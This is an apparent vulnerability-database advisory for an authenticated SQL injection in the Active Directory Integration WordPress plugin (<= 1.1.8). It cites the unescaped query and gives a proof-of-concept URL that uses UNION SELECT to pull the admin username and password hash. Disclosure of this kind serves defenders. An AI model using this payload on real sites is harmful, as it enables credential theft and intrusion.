Active Directory Integration <= 1.1.8 – Authenticated SQL Injection | Plugin Vulnerabilities

Description

Type user acces: administrator user.
Target need have configured ldap and active.

Path Request: /wp-content/plugins/active-directory-integration/syncback.php

Line : 135
$result = $ADI->bulksyncback( $_GET['userid'] );

$_GET[‘userid’] is not escaped.

Path Method: /wp-content/plugins/active-directory-integration/BulkSyncBackADIntegrationPlugin.class.php

Line: 142
$wpdb->get_results("SELECT user_id FROM $wpdb->usermeta WHERE meta_key = 'adi_samaccountname' AND meta_value <> '' AND user_id <> 1 AND user_id = $userid");

Proof of Concept

target.dev/wp-content/plugins/active-directory-integration/syncback.php?userid=1+UNION+SELECT+CONCAT(user_login,char(58),user_pass)+FROM+wp_users+WHERE+ID=1

Affects Plugins

active-directory-integration

No known fix

References

URL

https://lenonleite.com.br/en/2017/09/11/english-active-directory-integration-wordpress-plugin-sql-injection/

Classification

Type

SQLI

OWASP top 10

CWE

Miscellaneous

Submitter

Lenon Leite

Submitter website

http://lenonleite.com.br/

Submitter twitter

Verified

No

WPVDB ID

82f08b39-7ba7-412e-9371-2eb99e764481

Timeline

Publicly Published

2017-11-03 (about 8 years ago)

Added

2017-11-12 (about 8 years ago)

Last Updated

2019-11-01 (about 6 years ago)

Other

Published

Title

Published

2021-12-29

Title

Orange Form <= 1.0 - SQL Injection via CSRF

Published

2021-11-29

Title

Rich Reviews by Starfish < 1.9.6 - Admin+ SQL Injection

Published

2025-03-24

Title

WP Featured Entries <= 1.0 - Authenticated (Contributor+) SQL Injection

Published

2014-08-01

Title

Wysija Newsletters 2.2 - SQL Injection

Published

2014-08-01

Title

Profiles <= 2.0RC1 - SQL Injection